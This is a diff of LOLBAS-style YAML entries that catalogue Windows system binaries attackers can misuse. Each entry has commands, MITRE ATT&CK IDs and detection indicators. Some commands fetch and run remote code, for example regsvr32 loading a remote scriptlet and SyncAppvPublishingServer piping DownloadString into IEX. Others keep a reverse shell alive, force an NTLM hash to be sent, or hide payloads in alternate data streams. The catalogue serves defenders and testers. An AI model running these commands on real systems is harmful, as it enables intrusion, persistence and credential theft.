@ -35,11 +35,11 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: msiexec.exe getting files from Internet - IOC: msiexec.exe getting files from Internet
@ -51,4 +51,4 @@ Acknowledgement:
Handle: '@netbiosX' Handle: '@netbiosX'
- Person: Philip Tsukerman - Person: Philip Tsukerman
Handle: '@PhilipTsukerman' Handle: '@PhilipTsukerman'
--- ---

View File

@ -2,7 +2,7 @@
Name: Netsh.exe Name: Netsh.exe
Description: Netsh is a Windows tool used to manipulate network interface settings. Description: Netsh is a Windows tool used to manipulate network interface settings.
Author: 'Freddie Barr-Smith' Author: 'Freddie Barr-Smith'
Created: '2019-12-24' Created: 2019-12-24
Commands: Commands:
- Command: netsh.exe add helper C:\Users\User\file.dll - Command: netsh.exe add helper C:\Users\User\file.dll
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\WINDOWS\System32\Netsh.exe - Path: C:\WINDOWS\System32\Netsh.exe
- Path: C:\WINDOWS\SysWOW64\Netsh.exe - Path: C:\WINDOWS\SysWOW64\Netsh.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Netsh initiating a network connection - IOC: Netsh initiating a network connection
@ -32,4 +32,4 @@ Acknowledgement:
Handle: Handle:
- Person: 'Xabier Ugarte-Pedrero' - Person: 'Xabier Ugarte-Pedrero'
Handle: Handle:
--- ---

View File

@ -2,7 +2,7 @@
Name: Odbcconf.exe Name: Odbcconf.exe
Description: Used in Windows for managing ODBC connections Description: Used in Windows for managing ODBC connections
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: odbcconf -f file.rsp - Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file. Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\odbcconf.exe - Path: C:\Windows\System32\odbcconf.exe
- Path: C:\Windows\SysWOW64\odbcconf.exe - Path: C:\Windows\SysWOW64\odbcconf.exe
Code_Sample: Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
Detection: Detection:
- IOC: - IOC:
@ -36,4 +36,4 @@ Acknowledgement:
Handle: '@subtee' Handle: '@subtee'
- Person: Adam - Person: Adam
Handle: '@Hexacorn' Handle: '@Hexacorn'
--- ---

View File

@ -2,7 +2,7 @@
Name: Pcalua.exe Name: Pcalua.exe
Description: Program Compatibility Assistant Description: Program Compatibility Assistant
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: pcalua.exe -a calc.exe - Command: pcalua.exe -a calc.exe
Description: Open the target .EXE using the Program Compatibility Assistant. Description: Open the target .EXE using the Program Compatibility Assistant.
@ -30,7 +30,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\pcalua.exe - Path: C:\Windows\System32\pcalua.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
@ -41,4 +41,4 @@ Acknowledgement:
Handle: '@kylehanslovan' Handle: '@kylehanslovan'
- Person: Fab - Person: Fab
Handle: '@0rbz_' Handle: '@0rbz_'
--- ---

View File

@ -2,7 +2,7 @@
Name: Pcwrun.exe Name: Pcwrun.exe
Description: Program Compatibility Wizard Description: Program Compatibility Wizard
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Pcwrun.exe c:\temp\beacon.exe - Command: Pcwrun.exe c:\temp\beacon.exe
Description: Open the target .EXE file with the Program Compatibility Wizard. Description: Open the target .EXE file with the Program Compatibility Wizard.
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\pcwrun.exe - Path: C:\Windows\System32\pcwrun.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
@ -23,4 +23,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
--- ---

View File

@ -2,7 +2,7 @@
Name: Pktmon.exe Name: Pktmon.exe
Description: Capture Network Packets on the windows 10 with October 2018 Update or later. Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
Author: 'Derek Johnson' Author: 'Derek Johnson'
Created: '2020-08-12' Created: 2020-08-12
Commands: Commands:
- Command: pktmon.exe start --etw - Command: pktmon.exe start --etw
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
@ -23,9 +23,9 @@ Commands:
Full_Path: Full_Path:
- Path: c:\windows\system32\pktmon.exe - Path: c:\windows\system32\pktmon.exe
- Path: c:\windows\syswow64\pktmon.exe - Path: c:\windows\syswow64\pktmon.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: .etl files found on system - IOC: .etl files found on system
Resources: Resources:
- Link: https://binar-x79.com/windows-10-secret-sniffer/ - Link: https://binar-x79.com/windows-10-secret-sniffer/

View File

@ -2,7 +2,7 @@
Name: Presentationhost.exe Name: Presentationhost.exe
Description: File is used for executing Browser applications Description: File is used for executing Browser applications
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Presentationhost.exe C:\temp\Evil.xbap - Command: Presentationhost.exe C:\temp\Evil.xbap
Description: Executes the target XAML Browser Application (XBAP) file Description: Executes the target XAML Browser Application (XBAP) file
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\Presentationhost.exe - Path: C:\Windows\System32\Presentationhost.exe
- Path: C:\Windows\SysWOW64\Presentationhost.exe - Path: C:\Windows\SysWOW64\Presentationhost.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
@ -25,4 +25,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
--- ---

View File

@ -2,7 +2,7 @@
Name: Print.exe Name: Print.exe
Description: Used by Windows to send files to the printer Description: Used by Windows to send files to the printer
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
@ -31,7 +31,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\print.exe - Path: C:\Windows\System32\print.exe
- Path: C:\Windows\SysWOW64\print.exe - Path: C:\Windows\SysWOW64\print.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Print.exe getting files from internet - IOC: Print.exe getting files from internet
@ -42,4 +42,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,7 +2,7 @@
Name: Psr.exe Name: Psr.exe
Description: Windows Problem Steps Recorder, used to record screen and clicks. Description: Windows Problem Steps Recorder, used to record screen and clicks.
Author: Leon Rodenko Author: Leon Rodenko
Created: '2020-06-27' Created: 2020-06-27
Commands: Commands:
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0 - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file. Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
@ -15,9 +15,9 @@ Commands:
Full_Path: Full_Path:
- Path: c:\windows\system32\psr.exe - Path: c:\windows\system32\psr.exe
- Path: c:\windows\syswow64\psr.exe - Path: c:\windows\syswow64\psr.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: psr.exe spawned - IOC: psr.exe spawned
- IOC: suspicious activity when running with "/gui 0" flag - IOC: suspicious activity when running with "/gui 0" flag
Resources: Resources:

View File

@ -2,9 +2,9 @@
Name: Rasautou.exe Name: Rasautou.exe
Description: Windows Remote Access Dialer Description: Windows Remote Access Dialer
Author: 'Tony Lambert' Author: 'Tony Lambert'
Created: '2020-01-10' Created: 2020-01-10
Commands: Commands:
- Command: rasautou -d powershell.dll -p powershell -a a -e e - Command: rasautou -d powershell.dll -p powershell -a a -e e
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10. Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
Usecase: Execute DLL code Usecase: Execute DLL code
Category: Execute Category: Execute
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
Full_Path: Full_Path:
- Path: C:\Windows\System32\rasautou.exe - Path: C:\Windows\System32\rasautou.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: rasautou.exe command line containing -d and -p - IOC: rasautou.exe command line containing -d and -p
@ -24,4 +24,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: FireEye - Person: FireEye
Handle: '@FireEye' Handle: '@FireEye'
--- ---

View File

@ -2,7 +2,7 @@
Name: Reg.exe Name: Reg.exe
Description: Used to manipulate the registry Description: Used to manipulate the registry
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream. Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\reg.exe - Path: C:\Windows\System32\reg.exe
- Path: C:\Windows\SysWOW64\reg.exe - Path: C:\Windows\SysWOW64\reg.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: reg.exe writing to an ADS - IOC: reg.exe writing to an ADS
@ -24,4 +24,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,9 +2,9 @@
Name: Regasm.exe Name: Regasm.exe
Description: Part of .NET Description: Part of .NET
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: regasm.exe AllTheThingsx64.dll - Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
Category: AWL bypass Category: AWL bypass
@ -12,7 +12,7 @@ Commands:
MitreID: T1121 MitreID: T1121
MitreLink: https://attack.mitre.org/wiki/Technique/T1121 MitreLink: https://attack.mitre.org/wiki/Technique/T1121
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regasm.exe /U AllTheThingsx64.dll - Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function. Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
Category: Execute Category: Execute
@ -25,7 +25,7 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: regasm.exe executing dll file - IOC: regasm.exe executing dll file

View File

@ -2,7 +2,7 @@
Name: Regedit.exe Name: Regedit.exe
Description: Used by Windows to manipulate registry Description: Used by Windows to manipulate registry
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Description: Export the target Registry key to the specified .REG file. Description: Export the target Registry key to the specified .REG file.
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\regedit.exe - Path: C:\Windows\System32\regedit.exe
- Path: C:\Windows\SysWOW64\regedit.exe - Path: C:\Windows\SysWOW64\regedit.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: regedit.exe reading and writing to alternate data stream - IOC: regedit.exe reading and writing to alternate data stream
@ -33,4 +33,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,7 +2,7 @@
Name: Regini.exe Name: Regini.exe
Description: Used to manipulate the registry Description: Used to manipulate the registry
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2020-07-03' Created: 2020-07-03
Commands: Commands:
- Command: regini.exe newfile.txt:hidden.ini - Command: regini.exe newfile.txt:hidden.ini
Description: Write registry keys from data inside the Alternate data stream. Description: Write registry keys from data inside the Alternate data stream.
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\regini.exe - Path: C:\Windows\System32\regini.exe
- Path: C:\Windows\SysWOW64\regini.exe - Path: C:\Windows\SysWOW64\regini.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: regini.exe reading from ADS - IOC: regini.exe reading from ADS
@ -24,4 +24,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Eli Salem - Person: Eli Salem
Handle: '@elisalem9' Handle: '@elisalem9'
--- ---

View File

@ -2,7 +2,7 @@
Name: Register-cimprovider.exe Name: Register-cimprovider.exe
Description: Used to register new wmi providers Description: Used to register new wmi providers
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Register-cimprovider -path "C:\folder\evil.dll" - Command: Register-cimprovider -path "C:\folder\evil.dll"
Description: Load the target .DLL. Description: Load the target .DLL.
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\Register-cimprovider.exe - Path: C:\Windows\System32\Register-cimprovider.exe
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe - Path: C:\Windows\SysWOW64\Register-cimprovider.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
@ -24,4 +24,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Philip Tsukerman - Person: Philip Tsukerman
Handle: '@PhilipTsukerman' Handle: '@PhilipTsukerman'
--- ---

View File

@ -2,7 +2,7 @@
Name: Regsvcs.exe Name: Regsvcs.exe
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: regsvcs.exe AllTheThingsx64.dll - Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\regsvcs.exe - Path: C:\Windows\System32\regsvcs.exe
- Path: C:\Windows\SysWOW64\regsvcs.exe - Path: C:\Windows\SysWOW64\regsvcs.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:

View File

@ -2,7 +2,7 @@
Name: Regsvr32.exe Name: Regsvr32.exe
Description: Used by Windows to register dlls Description: Used by Windows to register dlls
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll. Description: Execute the specified remote .SCT script with scrobj.dll.
@ -39,7 +39,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\System32\regsvr32.exe
- Path: C:\Windows\SysWOW64\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: regsvr32.exe getting files from Internet - IOC: regsvr32.exe getting files from Internet
@ -51,4 +51,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
--- ---

View File

@ -1,12 +1,12 @@
--- ---
Name: Replace.exe Name: Replace.exe
Description: Used to replace file with another file Description: Used to replace file with another file
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: replace.exe C:\Source\File.cab C:\Destination /A - Command: replace.exe C:\Source\File.cab C:\Destination /A
Description: Copy file.cab to destination Description: Copy file.cab to destination
Usecase: Copy files Usecase: Copy files
Category: Copy Category: Copy
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
@ -14,7 +14,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Description: Download/Copy bar.exe to outdir Description: Download/Copy bar.exe to outdir
Usecase: Download file Usecase: Download file
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\replace.exe - Path: C:\Windows\System32\replace.exe
- Path: C:\Windows\SysWOW64\replace.exe - Path: C:\Windows\SysWOW64\replace.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Replace.exe getting files from remote server - IOC: Replace.exe getting files from remote server
@ -33,4 +33,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: elceef - Person: elceef
Handle: '@elceef' Handle: '@elceef'
--- ---

View File

@ -2,7 +2,7 @@
Name: Rpcping.exe Name: Rpcping.exe
Description: Used to verify rpc connection Description: Used to verify rpc connection
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\rpcping.exe - Path: C:\Windows\System32\rpcping.exe
- Path: C:\Windows\SysWOW64\rpcping.exe - Path: C:\Windows\SysWOW64\rpcping.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:
@ -28,4 +28,4 @@ Acknowledgement:
Handle: '@subtee' Handle: '@subtee'
- Person: Vincent Yiu - Person: Vincent Yiu
Handle: '@vysecurity' Handle: '@vysecurity'
--- ---

View File

@ -2,7 +2,7 @@
Name: Rundll32.exe Name: Rundll32.exe
Description: Used by Windows to execute dll files Description: Used by Windows to execute dll files
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: rundll32.exe AllTheThingsx64,EntryPoint - Command: rundll32.exe AllTheThingsx64,EntryPoint
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
@ -65,13 +65,13 @@ Commands:
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: MitreID:
MitreLink: MitreLink:
OperatingSystem: Windows 10 (and likely previous versions) OperatingSystem: Windows 10 (and likely previous versions)
Full_Path: Full_Path:
- Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\System32\rundll32.exe
- Path: C:\Windows\SysWOW64\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: - IOC:

View File

@ -1,8 +1,8 @@
--- ---
Name: Runonce.exe Name: Runonce.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Runonce.exe /AlternateShellStartup - Command: Runonce.exe /AlternateShellStartup
Description: Executes a Run Once Task that has been configured in the registry Description: Executes a Run Once Task that has been configured in the registry
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\System32\runonce.exe
- Path: C:\Windows\SysWOW64\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY - IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
@ -25,4 +25,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
--- ---

View File

@ -1,8 +1,8 @@
--- ---
Name: Runscripthelper.exe Name: Runscripthelper.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
Description: Execute the PowerShell script named test.txt Description: Execute the PowerShell script named test.txt
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Event 4014 - Powershell logging - IOC: Event 4014 - Powershell logging
@ -25,4 +25,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Matt Graeber - Person: Matt Graeber
Handle: '@mattifestation' Handle: '@mattifestation'
--- ---

View File

@ -2,12 +2,12 @@
Name: Sc.exe Name: Sc.exe
Description: Used by Windows to manage services Description: Used by Windows to manage services
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
Description: Creates a new service and executes the file stored in the ADS. Description: Creates a new service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream Usecase: Execute binary file hidden inside an alternate data stream
Category: ADS Category: ADS
Privileges: User Privileges: User
MitreID: T1096 MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\sc.exe - Path: C:\Windows\System32\sc.exe
- Path: C:\Windows\SysWOW64\sc.exe - Path: C:\Windows\SysWOW64\sc.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Services that gets created - IOC: Services that gets created
@ -24,4 +24,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
--- ---

View File

@ -2,12 +2,12 @@
Name: Schtasks.exe Name: Schtasks.exe
Description: Schedule periodic tasks Description: Schedule periodic tasks
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
Description: Create a recurring task to execute every minute. Description: Create a recurring task to execute every minute.
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1053 MitreID: T1053
MitreLink: https://attack.mitre.org/wiki/Technique/T1053 MitreLink: https://attack.mitre.org/wiki/Technique/T1053
@ -15,7 +15,7 @@ Commands:
Full_Path: Full_Path:
- Path: c:\windows\system32\schtasks.exe - Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Services that gets created - IOC: Services that gets created
@ -24,4 +24,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
--- ---

View File

@ -1,8 +1,8 @@
--- ---
Name: Scriptrunner.exe Name: Scriptrunner.exe
Description: Description:
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: Scriptrunner.exe -appvscript calc.exe - Command: Scriptrunner.exe -appvscript calc.exe
Description: Executes calc.exe Description: Executes calc.exe
@ -23,7 +23,7 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\System32\scriptrunner.exe
- Path: C:\Windows\SysWOW64\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed - IOC: Scriptrunner.exe should not be in use unless App-v is deployed
@ -34,4 +34,4 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Nick Tyrer - Person: Nick Tyrer
Handle: '@nicktyrer' Handle: '@nicktyrer'
--- ---

View File

@ -2,7 +2,7 @@
Name: SyncAppvPublishingServer.exe Name: SyncAppvPublishingServer.exe
Description: Used by App-v to get App-v server lists Description: Used by App-v to get App-v server lists
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
